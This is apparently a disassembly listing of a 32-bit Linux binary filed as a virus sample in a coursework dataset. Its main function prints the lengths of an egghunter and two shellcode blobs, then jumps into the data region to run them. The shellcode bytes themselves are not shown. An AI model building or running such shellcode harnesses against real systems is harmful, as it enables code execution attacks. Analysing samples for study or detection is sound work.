
/home/stas/Coursach/Выборки/compiled/viruses/28474:     формат файла elf32-i386


Дизассемблирование раздела .interp:

08048154 <.interp>:
 8048154:	2f                   	das    
 8048155:	6c                   	insb   (%dx),%es:(%edi)
 8048156:	69 62 2f 6c 64 2d 6c 	imul   $0x6c2d646c,0x2f(%edx),%esp
 804815d:	69 6e 75 78 2e 73 6f 	imul   $0x6f732e78,0x75(%esi),%ebp
 8048164:	2e 32 00             	xor    %cs:(%eax),%al

Дизассемблирование раздела .note.ABI-tag:

08048168 <.note.ABI-tag>:
 8048168:	04 00                	add    $0x0,%al
 804816a:	00 00                	add    %al,(%eax)
 804816c:	10 00                	adc    %al,(%eax)
 804816e:	00 00                	add    %al,(%eax)
 8048170:	01 00                	add    %eax,(%eax)
 8048172:	00 00                	add    %al,(%eax)
 8048174:	47                   	inc    %edi
 8048175:	4e                   	dec    %esi
 8048176:	55                   	push   %ebp
 8048177:	00 00                	add    %al,(%eax)
 8048179:	00 00                	add    %al,(%eax)
 804817b:	00 02                	add    %al,(%edx)
 804817d:	00 00                	add    %al,(%eax)
 804817f:	00 06                	add    %al,(%esi)
 8048181:	00 00                	add    %al,(%eax)
 8048183:	00 18                	add    %bl,(%eax)
 8048185:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .note.gnu.build-id:

08048188 <.note.gnu.build-id>:
 8048188:	04 00                	add    $0x0,%al
 804818a:	00 00                	add    %al,(%eax)
 804818c:	14 00                	adc    $0x0,%al
 804818e:	00 00                	add    %al,(%eax)
 8048190:	03 00                	add    (%eax),%eax
 8048192:	00 00                	add    %al,(%eax)
 8048194:	47                   	inc    %edi
 8048195:	4e                   	dec    %esi
 8048196:	55                   	push   %ebp
 8048197:	00 e3                	add    %ah,%bl
 8048199:	03 4f 55             	add    0x55(%edi),%ecx
 804819c:	1d 9d b9 bc 7f       	sbb    $0x7fbcb99d,%eax
 80481a1:	d3 7a 50             	sarl   %cl,0x50(%edx)
 80481a4:	a8 c4                	test   $0xc4,%al
 80481a6:	33 04 23             	xor    (%ebx,%eiz,1),%eax
 80481a9:	15                   	.byte 0x15
 80481aa:	55                   	push   %ebp
 80481ab:	dd                   	.byte 0xdd

Дизассемблирование раздела .gnu.hash:

080481ac <.gnu.hash>:
 80481ac:	02 00                	add    (%eax),%al
 80481ae:	00 00                	add    %al,(%eax)
 80481b0:	04 00                	add    $0x0,%al
 80481b2:	00 00                	add    %al,(%eax)
 80481b4:	01 00                	add    %eax,(%eax)
 80481b6:	00 00                	add    %al,(%eax)
 80481b8:	05 00 00 00 00       	add    $0x0,%eax
 80481bd:	20 00                	and    %al,(%eax)
 80481bf:	20 00                	and    %al,(%eax)
 80481c1:	00 00                	add    %al,(%eax)
 80481c3:	00 04 00             	add    %al,(%eax,%eax,1)
 80481c6:	00 00                	add    %al,(%eax)
 80481c8:	ad                   	lods   %ds:(%esi),%eax
 80481c9:	4b                   	dec    %ebx
 80481ca:	e3 c0                	jecxz  804818c <_init-0x128>

Дизассемблирование раздела .dynsym:

080481cc <.dynsym>:
	...
 80481dc:	1a 00                	sbb    (%eax),%al
	...
 80481e6:	00 00                	add    %al,(%eax)
 80481e8:	12 00                	adc    (%eax),%al
 80481ea:	00 00                	add    %al,(%eax)
 80481ec:	33 00                	xor    (%eax),%eax
	...
 80481f6:	00 00                	add    %al,(%eax)
 80481f8:	20 00                	and    %al,(%eax)
 80481fa:	00 00                	add    %al,(%eax)
 80481fc:	21 00                	and    %eax,(%eax)
	...
 8048206:	00 00                	add    %al,(%eax)
 8048208:	12 00                	adc    (%eax),%al
 804820a:	00 00                	add    %al,(%eax)
 804820c:	0b 00                	or     (%eax),%eax
 804820e:	00 00                	add    %al,(%eax)
 8048210:	fc                   	cld    
 8048211:	84 04 08             	test   %al,(%eax,%ecx,1)
 8048214:	04 00                	add    $0x0,%al
 8048216:	00 00                	add    %al,(%eax)
 8048218:	11 00                	adc    %eax,(%eax)
 804821a:	0f                   	.byte 0xf
	...

Дизассемблирование раздела .dynstr:

0804821c <.dynstr>:
 804821c:	00 6c 69 62          	add    %ch,0x62(%ecx,%ebp,2)
 8048220:	63 2e                	arpl   %bp,(%esi)
 8048222:	73 6f                	jae    8048293 <_init-0x21>
 8048224:	2e 36 00 5f 49       	cs add %bl,%cs:%ss:0x49(%edi)
 8048229:	4f                   	dec    %edi
 804822a:	5f                   	pop    %edi
 804822b:	73 74                	jae    80482a1 <_init-0x13>
 804822d:	64 69 6e 5f 75 73 65 	imul   $0x64657375,%fs:0x5f(%esi),%ebp
 8048234:	64 
 8048235:	00 70 72             	add    %dh,0x72(%eax)
 8048238:	69 6e 74 66 00 5f 5f 	imul   $0x5f5f0066,0x74(%esi),%ebp
 804823f:	6c                   	insb   (%dx),%es:(%edi)
 8048240:	69 62 63 5f 73 74 61 	imul   $0x6174735f,0x63(%edx),%esp
 8048247:	72 74                	jb     80482bd <_init+0x9>
 8048249:	5f                   	pop    %edi
 804824a:	6d                   	insl   (%dx),%es:(%edi)
 804824b:	61                   	popa   
 804824c:	69 6e 00 5f 5f 67 6d 	imul   $0x6d675f5f,0x0(%esi),%ebp
 8048253:	6f                   	outsl  %ds:(%esi),(%dx)
 8048254:	6e                   	outsb  %ds:(%esi),(%dx)
 8048255:	5f                   	pop    %edi
 8048256:	73 74                	jae    80482cc <_init+0x18>
 8048258:	61                   	popa   
 8048259:	72 74                	jb     80482cf <_init+0x1b>
 804825b:	5f                   	pop    %edi
 804825c:	5f                   	pop    %edi
 804825d:	00 47 4c             	add    %al,0x4c(%edi)
 8048260:	49                   	dec    %ecx
 8048261:	42                   	inc    %edx
 8048262:	43                   	inc    %ebx
 8048263:	5f                   	pop    %edi
 8048264:	32 2e                	xor    (%esi),%ch
 8048266:	30 00                	xor    %al,(%eax)

Дизассемблирование раздела .gnu.version:

08048268 <.gnu.version>:
 8048268:	00 00                	add    %al,(%eax)
 804826a:	02 00                	add    (%eax),%al
 804826c:	00 00                	add    %al,(%eax)
 804826e:	02 00                	add    (%eax),%al
 8048270:	01 00                	add    %eax,(%eax)

Дизассемблирование раздела .gnu.version_r:

08048274 <.gnu.version_r>:
 8048274:	01 00                	add    %eax,(%eax)
 8048276:	01 00                	add    %eax,(%eax)
 8048278:	01 00                	add    %eax,(%eax)
 804827a:	00 00                	add    %al,(%eax)
 804827c:	10 00                	adc    %al,(%eax)
 804827e:	00 00                	add    %al,(%eax)
 8048280:	00 00                	add    %al,(%eax)
 8048282:	00 00                	add    %al,(%eax)
 8048284:	10 69 69             	adc    %ch,0x69(%ecx)
 8048287:	0d 00 00 02 00       	or     $0x20000,%eax
 804828c:	42                   	inc    %edx
 804828d:	00 00                	add    %al,(%eax)
 804828f:	00 00                	add    %al,(%eax)
 8048291:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .rel.dyn:

08048294 <.rel.dyn>:
 8048294:	fc                   	cld    
 8048295:	9f                   	lahf   
 8048296:	04 08                	add    $0x8,%al
 8048298:	06                   	push   %es
 8048299:	02 00                	add    (%eax),%al
	...

Дизассемблирование раздела .rel.plt:

0804829c <.rel.plt>:
 804829c:	0c a0                	or     $0xa0,%al
 804829e:	04 08                	add    $0x8,%al
 80482a0:	07                   	pop    %es
 80482a1:	01 00                	add    %eax,(%eax)
 80482a3:	00 10                	add    %dl,(%eax)
 80482a5:	a0 04 08 07 02       	mov    0x2070804,%al
 80482aa:	00 00                	add    %al,(%eax)
 80482ac:	14 a0                	adc    $0xa0,%al
 80482ae:	04 08                	add    $0x8,%al
 80482b0:	07                   	pop    %es
 80482b1:	03 00                	add    (%eax),%eax
	...

Дизассемблирование раздела .init:

080482b4 <_init>:
 80482b4:	53                   	push   %ebx
 80482b5:	83 ec 08             	sub    $0x8,%esp
 80482b8:	e8 93 00 00 00       	call   8048350 <__x86.get_pc_thunk.bx>
 80482bd:	81 c3 43 1d 00 00    	add    $0x1d43,%ebx
 80482c3:	8b 83 fc ff ff ff    	mov    -0x4(%ebx),%eax
 80482c9:	85 c0                	test   %eax,%eax
 80482cb:	74 05                	je     80482d2 <_init+0x1e>
 80482cd:	e8 2e 00 00 00       	call   8048300 <__gmon_start__@plt>
 80482d2:	83 c4 08             	add    $0x8,%esp
 80482d5:	5b                   	pop    %ebx
 80482d6:	c3                   	ret    

Дизассемблирование раздела .plt:

080482e0 <printf@plt-0x10>:
 80482e0:	ff 35 04 a0 04 08    	pushl  0x804a004
 80482e6:	ff 25 08 a0 04 08    	jmp    *0x804a008
 80482ec:	00 00                	add    %al,(%eax)
	...

080482f0 <printf@plt>:
 80482f0:	ff 25 0c a0 04 08    	jmp    *0x804a00c
 80482f6:	68 00 00 00 00       	push   $0x0
 80482fb:	e9 e0 ff ff ff       	jmp    80482e0 <_init+0x2c>

08048300 <__gmon_start__@plt>:
 8048300:	ff 25 10 a0 04 08    	jmp    *0x804a010
 8048306:	68 08 00 00 00       	push   $0x8
 804830b:	e9 d0 ff ff ff       	jmp    80482e0 <_init+0x2c>

08048310 <__libc_start_main@plt>:
 8048310:	ff 25 14 a0 04 08    	jmp    *0x804a014
 8048316:	68 10 00 00 00       	push   $0x10
 804831b:	e9 c0 ff ff ff       	jmp    80482e0 <_init+0x2c>

Дизассемблирование раздела .text:

08048320 <_start>:
 8048320:	31 ed                	xor    %ebp,%ebp
 8048322:	5e                   	pop    %esi
 8048323:	89 e1                	mov    %esp,%ecx
 8048325:	83 e4 f0             	and    $0xfffffff0,%esp
 8048328:	50                   	push   %eax
 8048329:	54                   	push   %esp
 804832a:	52                   	push   %edx
 804832b:	68 e0 84 04 08       	push   $0x80484e0
 8048330:	68 70 84 04 08       	push   $0x8048470
 8048335:	51                   	push   %ecx
 8048336:	56                   	push   %esi
 8048337:	68 1d 84 04 08       	push   $0x804841d
 804833c:	e8 cf ff ff ff       	call   8048310 <__libc_start_main@plt>
 8048341:	f4                   	hlt    
 8048342:	66 90                	xchg   %ax,%ax
 8048344:	66 90                	xchg   %ax,%ax
 8048346:	66 90                	xchg   %ax,%ax
 8048348:	66 90                	xchg   %ax,%ax
 804834a:	66 90                	xchg   %ax,%ax
 804834c:	66 90                	xchg   %ax,%ax
 804834e:	66 90                	xchg   %ax,%ax

08048350 <__x86.get_pc_thunk.bx>:
 8048350:	8b 1c 24             	mov    (%esp),%ebx
 8048353:	c3                   	ret    
 8048354:	66 90                	xchg   %ax,%ax
 8048356:	66 90                	xchg   %ax,%ax
 8048358:	66 90                	xchg   %ax,%ax
 804835a:	66 90                	xchg   %ax,%ax
 804835c:	66 90                	xchg   %ax,%ax
 804835e:	66 90                	xchg   %ax,%ax

08048360 <deregister_tm_clones>:
 8048360:	b8 f7 a0 04 08       	mov    $0x804a0f7,%eax
 8048365:	2d f4 a0 04 08       	sub    $0x804a0f4,%eax
 804836a:	83 f8 06             	cmp    $0x6,%eax
 804836d:	77 01                	ja     8048370 <deregister_tm_clones+0x10>
 804836f:	c3                   	ret    
 8048370:	b8 00 00 00 00       	mov    $0x0,%eax
 8048375:	85 c0                	test   %eax,%eax
 8048377:	74 f6                	je     804836f <deregister_tm_clones+0xf>
 8048379:	55                   	push   %ebp
 804837a:	89 e5                	mov    %esp,%ebp
 804837c:	83 ec 18             	sub    $0x18,%esp
 804837f:	c7 04 24 f4 a0 04 08 	movl   $0x804a0f4,(%esp)
 8048386:	ff d0                	call   *%eax
 8048388:	c9                   	leave  
 8048389:	c3                   	ret    
 804838a:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi

08048390 <register_tm_clones>:
 8048390:	b8 f4 a0 04 08       	mov    $0x804a0f4,%eax
 8048395:	2d f4 a0 04 08       	sub    $0x804a0f4,%eax
 804839a:	c1 f8 02             	sar    $0x2,%eax
 804839d:	89 c2                	mov    %eax,%edx
 804839f:	c1 ea 1f             	shr    $0x1f,%edx
 80483a2:	01 d0                	add    %edx,%eax
 80483a4:	d1 f8                	sar    %eax
 80483a6:	75 01                	jne    80483a9 <register_tm_clones+0x19>
 80483a8:	c3                   	ret    
 80483a9:	ba 00 00 00 00       	mov    $0x0,%edx
 80483ae:	85 d2                	test   %edx,%edx
 80483b0:	74 f6                	je     80483a8 <register_tm_clones+0x18>
 80483b2:	55                   	push   %ebp
 80483b3:	89 e5                	mov    %esp,%ebp
 80483b5:	83 ec 18             	sub    $0x18,%esp
 80483b8:	89 44 24 04          	mov    %eax,0x4(%esp)
 80483bc:	c7 04 24 f4 a0 04 08 	movl   $0x804a0f4,(%esp)
 80483c3:	ff d2                	call   *%edx
 80483c5:	c9                   	leave  
 80483c6:	c3                   	ret    
 80483c7:	89 f6                	mov    %esi,%esi
 80483c9:	8d bc 27 00 00 00 00 	lea    0x0(%edi,%eiz,1),%edi

080483d0 <__do_global_dtors_aux>:
 80483d0:	80 3d f1 a0 04 08 00 	cmpb   $0x0,0x804a0f1
 80483d7:	75 13                	jne    80483ec <__do_global_dtors_aux+0x1c>
 80483d9:	55                   	push   %ebp
 80483da:	89 e5                	mov    %esp,%ebp
 80483dc:	83 ec 08             	sub    $0x8,%esp
 80483df:	e8 7c ff ff ff       	call   8048360 <deregister_tm_clones>
 80483e4:	c6 05 f1 a0 04 08 01 	movb   $0x1,0x804a0f1
 80483eb:	c9                   	leave  
 80483ec:	f3 c3                	repz ret 
 80483ee:	66 90                	xchg   %ax,%ax

080483f0 <frame_dummy>:
 80483f0:	a1 10 9f 04 08       	mov    0x8049f10,%eax
 80483f5:	85 c0                	test   %eax,%eax
 80483f7:	74 1f                	je     8048418 <frame_dummy+0x28>
 80483f9:	b8 00 00 00 00       	mov    $0x0,%eax
 80483fe:	85 c0                	test   %eax,%eax
 8048400:	74 16                	je     8048418 <frame_dummy+0x28>
 8048402:	55                   	push   %ebp
 8048403:	89 e5                	mov    %esp,%ebp
 8048405:	83 ec 18             	sub    $0x18,%esp
 8048408:	c7 04 24 10 9f 04 08 	movl   $0x8049f10,(%esp)
 804840f:	ff d0                	call   *%eax
 8048411:	c9                   	leave  
 8048412:	e9 79 ff ff ff       	jmp    8048390 <register_tm_clones>
 8048417:	90                   	nop
 8048418:	e9 73 ff ff ff       	jmp    8048390 <register_tm_clones>

0804841d <main>:
 804841d:	55                   	push   %ebp
 804841e:	89 e5                	mov    %esp,%ebp
 8048420:	83 e4 f0             	and    $0xfffffff0,%esp
 8048423:	83 ec 10             	sub    $0x10,%esp
 8048426:	c7 44 24 04 30 00 00 	movl   $0x30,0x4(%esp)
 804842d:	00 
 804842e:	c7 04 24 00 85 04 08 	movl   $0x8048500,(%esp)
 8048435:	e8 b6 fe ff ff       	call   80482f0 <printf@plt>
 804843a:	c7 44 24 04 3b 00 00 	movl   $0x3b,0x4(%esp)
 8048441:	00 
 8048442:	c7 04 24 18 85 04 08 	movl   $0x8048518,(%esp)
 8048449:	e8 a2 fe ff ff       	call   80482f0 <printf@plt>
 804844e:	c7 44 24 04 2c 00 00 	movl   $0x2c,0x4(%esp)
 8048455:	00 
 8048456:	c7 04 24 30 85 04 08 	movl   $0x8048530,(%esp)
 804845d:	e8 8e fe ff ff       	call   80482f0 <printf@plt>
 8048462:	b8 c0 a0 04 08       	mov    $0x804a0c0,%eax
 8048467:	ff d0                	call   *%eax
 8048469:	c9                   	leave  
 804846a:	c3                   	ret    
 804846b:	66 90                	xchg   %ax,%ax
 804846d:	66 90                	xchg   %ax,%ax
 804846f:	90                   	nop

08048470 <__libc_csu_init>:
 8048470:	55                   	push   %ebp
 8048471:	57                   	push   %edi
 8048472:	31 ff                	xor    %edi,%edi
 8048474:	56                   	push   %esi
 8048475:	53                   	push   %ebx
 8048476:	e8 d5 fe ff ff       	call   8048350 <__x86.get_pc_thunk.bx>
 804847b:	81 c3 85 1b 00 00    	add    $0x1b85,%ebx
 8048481:	83 ec 1c             	sub    $0x1c,%esp
 8048484:	8b 6c 24 30          	mov    0x30(%esp),%ebp
 8048488:	8d b3 0c ff ff ff    	lea    -0xf4(%ebx),%esi
 804848e:	e8 21 fe ff ff       	call   80482b4 <_init>
 8048493:	8d 83 08 ff ff ff    	lea    -0xf8(%ebx),%eax
 8048499:	29 c6                	sub    %eax,%esi
 804849b:	c1 fe 02             	sar    $0x2,%esi
 804849e:	85 f6                	test   %esi,%esi
 80484a0:	74 27                	je     80484c9 <__libc_csu_init+0x59>
 80484a2:	8d b6 00 00 00 00    	lea    0x0(%esi),%esi
 80484a8:	8b 44 24 38          	mov    0x38(%esp),%eax
 80484ac:	89 2c 24             	mov    %ebp,(%esp)
 80484af:	89 44 24 08          	mov    %eax,0x8(%esp)
 80484b3:	8b 44 24 34          	mov    0x34(%esp),%eax
 80484b7:	89 44 24 04          	mov    %eax,0x4(%esp)
 80484bb:	ff 94 bb 08 ff ff ff 	call   *-0xf8(%ebx,%edi,4)
 80484c2:	83 c7 01             	add    $0x1,%edi
 80484c5:	39 f7                	cmp    %esi,%edi
 80484c7:	75 df                	jne    80484a8 <__libc_csu_init+0x38>
 80484c9:	83 c4 1c             	add    $0x1c,%esp
 80484cc:	5b                   	pop    %ebx
 80484cd:	5e                   	pop    %esi
 80484ce:	5f                   	pop    %edi
 80484cf:	5d                   	pop    %ebp
 80484d0:	c3                   	ret    
 80484d1:	eb 0d                	jmp    80484e0 <__libc_csu_fini>
 80484d3:	90                   	nop
 80484d4:	90                   	nop
 80484d5:	90                   	nop
 80484d6:	90                   	nop
 80484d7:	90                   	nop
 80484d8:	90                   	nop
 80484d9:	90                   	nop
 80484da:	90                   	nop
 80484db:	90                   	nop
 80484dc:	90                   	nop
 80484dd:	90                   	nop
 80484de:	90                   	nop
 80484df:	90                   	nop

080484e0 <__libc_csu_fini>:
 80484e0:	f3 c3                	repz ret 

Дизассемблирование раздела .fini:

080484e4 <_fini>:
 80484e4:	53                   	push   %ebx
 80484e5:	83 ec 08             	sub    $0x8,%esp
 80484e8:	e8 63 fe ff ff       	call   8048350 <__x86.get_pc_thunk.bx>
 80484ed:	81 c3 13 1b 00 00    	add    $0x1b13,%ebx
 80484f3:	83 c4 08             	add    $0x8,%esp
 80484f6:	5b                   	pop    %ebx
 80484f7:	c3                   	ret    

Дизассемблирование раздела .rodata:

080484f8 <_fp_hw>:
 80484f8:	03 00                	add    (%eax),%eax
	...

080484fc <_IO_stdin_used>:
 80484fc:	01 00                	add    %eax,(%eax)
 80484fe:	02 00                	add    (%eax),%al
 8048500:	65                   	gs
 8048501:	67 67 68 75 6e 74 65 	addr32 addr16 push $0x65746e75
 8048508:	72 20                	jb     804852a <_IO_stdin_used+0x2e>
 804850a:	6c                   	insb   (%dx),%es:(%edi)
 804850b:	65 6e                	outsb  %gs:(%esi),(%dx)
 804850d:	67 74 68             	addr16 je 8048578 <_IO_stdin_used+0x7c>
 8048510:	3a 20                	cmp    (%eax),%ah
 8048512:	20 20                	and    %ah,(%eax)
 8048514:	25 64 0a 00 73       	and    $0x73000a64,%eax
 8048519:	68 65 6c 6c 63       	push   $0x636c6c65
 804851e:	6f                   	outsl  %ds:(%esi),(%dx)
 804851f:	64 65 31 20          	fs xor %esp,%fs:%gs:(%eax)
 8048523:	6c                   	insb   (%dx),%es:(%edi)
 8048524:	65 6e                	outsb  %gs:(%esi),(%dx)
 8048526:	67 74 68             	addr16 je 8048591 <_IO_stdin_used+0x95>
 8048529:	3a 20                	cmp    (%eax),%ah
 804852b:	20 25 64 0a 00 73    	and    %ah,0x73000a64
 8048531:	68 65 6c 6c 63       	push   $0x636c6c65
 8048536:	6f                   	outsl  %ds:(%esi),(%dx)
 8048537:	64 65 32 20          	fs xor %fs:%gs:(%eax),%ah
 804853b:	6c                   	insb   (%dx),%es:(%edi)
 804853c:	65 6e                	outsb  %gs:(%esi),(%dx)
 804853e:	67 74 68             	addr16 je 80485a9 <_IO_stdin_used+0xad>
 8048541:	3a 20                	cmp    (%eax),%ah
 8048543:	20                   	.byte 0x20
 8048544:	25                   	.byte 0x25
 8048545:	64 0a 00             	or     %fs:(%eax),%al

Дизассемблирование раздела .eh_frame_hdr:

08048548 <.eh_frame_hdr>:
 8048548:	01 1b                	add    %ebx,(%ebx)
 804854a:	03 3b                	add    (%ebx),%edi
 804854c:	28 00                	sub    %al,(%eax)
 804854e:	00 00                	add    %al,(%eax)
 8048550:	04 00                	add    $0x0,%al
 8048552:	00 00                	add    %al,(%eax)
 8048554:	98                   	cwtl   
 8048555:	fd                   	std    
 8048556:	ff                   	(bad)  
 8048557:	ff 44 00 00          	incl   0x0(%eax,%eax,1)
 804855b:	00 d5                	add    %dl,%ch
 804855d:	fe                   	(bad)  
 804855e:	ff                   	(bad)  
 804855f:	ff 68 00             	ljmp   *0x0(%eax)
 8048562:	00 00                	add    %al,(%eax)
 8048564:	28 ff                	sub    %bh,%bh
 8048566:	ff                   	(bad)  
 8048567:	ff 88 00 00 00 98    	decl   -0x68000000(%eax)
 804856d:	ff                   	(bad)  
 804856e:	ff                   	(bad)  
 804856f:	ff c4                	inc    %esp
 8048571:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .eh_frame:

08048574 <__FRAME_END__-0xac>:
 8048574:	14 00                	adc    $0x0,%al
 8048576:	00 00                	add    %al,(%eax)
 8048578:	00 00                	add    %al,(%eax)
 804857a:	00 00                	add    %al,(%eax)
 804857c:	01 7a 52             	add    %edi,0x52(%edx)
 804857f:	00 01                	add    %al,(%ecx)
 8048581:	7c 08                	jl     804858b <_IO_stdin_used+0x8f>
 8048583:	01 1b                	add    %ebx,(%ebx)
 8048585:	0c 04                	or     $0x4,%al
 8048587:	04 88                	add    $0x88,%al
 8048589:	01 00                	add    %eax,(%eax)
 804858b:	00 20                	add    %ah,(%eax)
 804858d:	00 00                	add    %al,(%eax)
 804858f:	00 1c 00             	add    %bl,(%eax,%eax,1)
 8048592:	00 00                	add    %al,(%eax)
 8048594:	4c                   	dec    %esp
 8048595:	fd                   	std    
 8048596:	ff                   	(bad)  
 8048597:	ff 40 00             	incl   0x0(%eax)
 804859a:	00 00                	add    %al,(%eax)
 804859c:	00 0e                	add    %cl,(%esi)
 804859e:	08 46 0e             	or     %al,0xe(%esi)
 80485a1:	0c 4a                	or     $0x4a,%al
 80485a3:	0f 0b                	ud2    
 80485a5:	74 04                	je     80485ab <_IO_stdin_used+0xaf>
 80485a7:	78 00                	js     80485a9 <_IO_stdin_used+0xad>
 80485a9:	3f                   	aas    
 80485aa:	1a 3b                	sbb    (%ebx),%bh
 80485ac:	2a 32                	sub    (%edx),%dh
 80485ae:	24 22                	and    $0x22,%al
 80485b0:	1c 00                	sbb    $0x0,%al
 80485b2:	00 00                	add    %al,(%eax)
 80485b4:	40                   	inc    %eax
 80485b5:	00 00                	add    %al,(%eax)
 80485b7:	00 65 fe             	add    %ah,-0x2(%ebp)
 80485ba:	ff                   	(bad)  
 80485bb:	ff 4e 00             	decl   0x0(%esi)
 80485be:	00 00                	add    %al,(%eax)
 80485c0:	00 41 0e             	add    %al,0xe(%ecx)
 80485c3:	08 85 02 42 0d 05    	or     %al,0x50d4202(%ebp)
 80485c9:	02 4a c5             	add    -0x3b(%edx),%cl
 80485cc:	0c 04                	or     $0x4,%al
 80485ce:	04 00                	add    $0x0,%al
 80485d0:	38 00                	cmp    %al,(%eax)
 80485d2:	00 00                	add    %al,(%eax)
 80485d4:	60                   	pusha  
 80485d5:	00 00                	add    %al,(%eax)
 80485d7:	00 98 fe ff ff 61    	add    %bl,0x61fffffe(%eax)
 80485dd:	00 00                	add    %al,(%eax)
 80485df:	00 00                	add    %al,(%eax)
 80485e1:	41                   	inc    %ecx
 80485e2:	0e                   	push   %cs
 80485e3:	08 85 02 41 0e 0c    	or     %al,0xc0e4102(%ebp)
 80485e9:	87 03                	xchg   %eax,(%ebx)
 80485eb:	43                   	inc    %ebx
 80485ec:	0e                   	push   %cs
 80485ed:	10 86 04 41 0e 14    	adc    %al,0x140e4104(%esi)
 80485f3:	83 05 4e 0e 30 02 48 	addl   $0x48,0x2300e4e
 80485fa:	0e                   	push   %cs
 80485fb:	14 41                	adc    $0x41,%al
 80485fd:	c3                   	ret    
 80485fe:	0e                   	push   %cs
 80485ff:	10 41 c6             	adc    %al,-0x3a(%ecx)
 8048602:	0e                   	push   %cs
 8048603:	0c 41                	or     $0x41,%al
 8048605:	c7                   	(bad)  
 8048606:	0e                   	push   %cs
 8048607:	08 41 c5             	or     %al,-0x3b(%ecx)
 804860a:	0e                   	push   %cs
 804860b:	04 10                	add    $0x10,%al
 804860d:	00 00                	add    %al,(%eax)
 804860f:	00 9c 00 00 00 cc fe 	add    %bl,-0x1340000(%eax,%eax,1)
 8048616:	ff                   	(bad)  
 8048617:	ff 02                	incl   (%edx)
 8048619:	00 00                	add    %al,(%eax)
 804861b:	00 00                	add    %al,(%eax)
 804861d:	00 00                	add    %al,(%eax)
	...

08048620 <__FRAME_END__>:
 8048620:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .init_array:

08049f08 <__frame_dummy_init_array_entry>:
 8049f08:	f0                   	lock
 8049f09:	83                   	.byte 0x83
 8049f0a:	04 08                	add    $0x8,%al

Дизассемблирование раздела .fini_array:

08049f0c <__do_global_dtors_aux_fini_array_entry>:
 8049f0c:	d0                   	.byte 0xd0
 8049f0d:	83                   	.byte 0x83
 8049f0e:	04 08                	add    $0x8,%al

Дизассемблирование раздела .jcr:

08049f10 <__JCR_END__>:
 8049f10:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .dynamic:

08049f14 <_DYNAMIC>:
 8049f14:	01 00                	add    %eax,(%eax)
 8049f16:	00 00                	add    %al,(%eax)
 8049f18:	01 00                	add    %eax,(%eax)
 8049f1a:	00 00                	add    %al,(%eax)
 8049f1c:	0c 00                	or     $0x0,%al
 8049f1e:	00 00                	add    %al,(%eax)
 8049f20:	b4 82                	mov    $0x82,%ah
 8049f22:	04 08                	add    $0x8,%al
 8049f24:	0d 00 00 00 e4       	or     $0xe4000000,%eax
 8049f29:	84 04 08             	test   %al,(%eax,%ecx,1)
 8049f2c:	19 00                	sbb    %eax,(%eax)
 8049f2e:	00 00                	add    %al,(%eax)
 8049f30:	08 9f 04 08 1b 00    	or     %bl,0x1b0804(%edi)
 8049f36:	00 00                	add    %al,(%eax)
 8049f38:	04 00                	add    $0x0,%al
 8049f3a:	00 00                	add    %al,(%eax)
 8049f3c:	1a 00                	sbb    (%eax),%al
 8049f3e:	00 00                	add    %al,(%eax)
 8049f40:	0c 9f                	or     $0x9f,%al
 8049f42:	04 08                	add    $0x8,%al
 8049f44:	1c 00                	sbb    $0x0,%al
 8049f46:	00 00                	add    %al,(%eax)
 8049f48:	04 00                	add    $0x0,%al
 8049f4a:	00 00                	add    %al,(%eax)
 8049f4c:	f5                   	cmc    
 8049f4d:	fe                   	(bad)  
 8049f4e:	ff 6f ac             	ljmp   *-0x54(%edi)
 8049f51:	81 04 08 05 00 00 00 	addl   $0x5,(%eax,%ecx,1)
 8049f58:	1c 82                	sbb    $0x82,%al
 8049f5a:	04 08                	add    $0x8,%al
 8049f5c:	06                   	push   %es
 8049f5d:	00 00                	add    %al,(%eax)
 8049f5f:	00 cc                	add    %cl,%ah
 8049f61:	81 04 08 0a 00 00 00 	addl   $0xa,(%eax,%ecx,1)
 8049f68:	4c                   	dec    %esp
 8049f69:	00 00                	add    %al,(%eax)
 8049f6b:	00 0b                	add    %cl,(%ebx)
 8049f6d:	00 00                	add    %al,(%eax)
 8049f6f:	00 10                	add    %dl,(%eax)
 8049f71:	00 00                	add    %al,(%eax)
 8049f73:	00 15 00 00 00 00    	add    %dl,0x0
 8049f79:	00 00                	add    %al,(%eax)
 8049f7b:	00 03                	add    %al,(%ebx)
 8049f7d:	00 00                	add    %al,(%eax)
 8049f7f:	00 00                	add    %al,(%eax)
 8049f81:	a0 04 08 02 00       	mov    0x20804,%al
 8049f86:	00 00                	add    %al,(%eax)
 8049f88:	18 00                	sbb    %al,(%eax)
 8049f8a:	00 00                	add    %al,(%eax)
 8049f8c:	14 00                	adc    $0x0,%al
 8049f8e:	00 00                	add    %al,(%eax)
 8049f90:	11 00                	adc    %eax,(%eax)
 8049f92:	00 00                	add    %al,(%eax)
 8049f94:	17                   	pop    %ss
 8049f95:	00 00                	add    %al,(%eax)
 8049f97:	00 9c 82 04 08 11 00 	add    %bl,0x110804(%edx,%eax,4)
 8049f9e:	00 00                	add    %al,(%eax)
 8049fa0:	94                   	xchg   %eax,%esp
 8049fa1:	82                   	(bad)  
 8049fa2:	04 08                	add    $0x8,%al
 8049fa4:	12 00                	adc    (%eax),%al
 8049fa6:	00 00                	add    %al,(%eax)
 8049fa8:	08 00                	or     %al,(%eax)
 8049faa:	00 00                	add    %al,(%eax)
 8049fac:	13 00                	adc    (%eax),%eax
 8049fae:	00 00                	add    %al,(%eax)
 8049fb0:	08 00                	or     %al,(%eax)
 8049fb2:	00 00                	add    %al,(%eax)
 8049fb4:	fe                   	(bad)  
 8049fb5:	ff                   	(bad)  
 8049fb6:	ff 6f 74             	ljmp   *0x74(%edi)
 8049fb9:	82                   	(bad)  
 8049fba:	04 08                	add    $0x8,%al
 8049fbc:	ff                   	(bad)  
 8049fbd:	ff                   	(bad)  
 8049fbe:	ff 6f 01             	ljmp   *0x1(%edi)
 8049fc1:	00 00                	add    %al,(%eax)
 8049fc3:	00 f0                	add    %dh,%al
 8049fc5:	ff                   	(bad)  
 8049fc6:	ff 6f 68             	ljmp   *0x68(%edi)
 8049fc9:	82                   	(bad)  
 8049fca:	04 08                	add    $0x8,%al
	...

Дизассемблирование раздела .got:

08049ffc <.got>:
 8049ffc:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .got.plt:

0804a000 <_GLOBAL_OFFSET_TABLE_>:
 804a000:	14 9f                	adc    $0x9f,%al
 804a002:	04 08                	add    $0x8,%al
	...
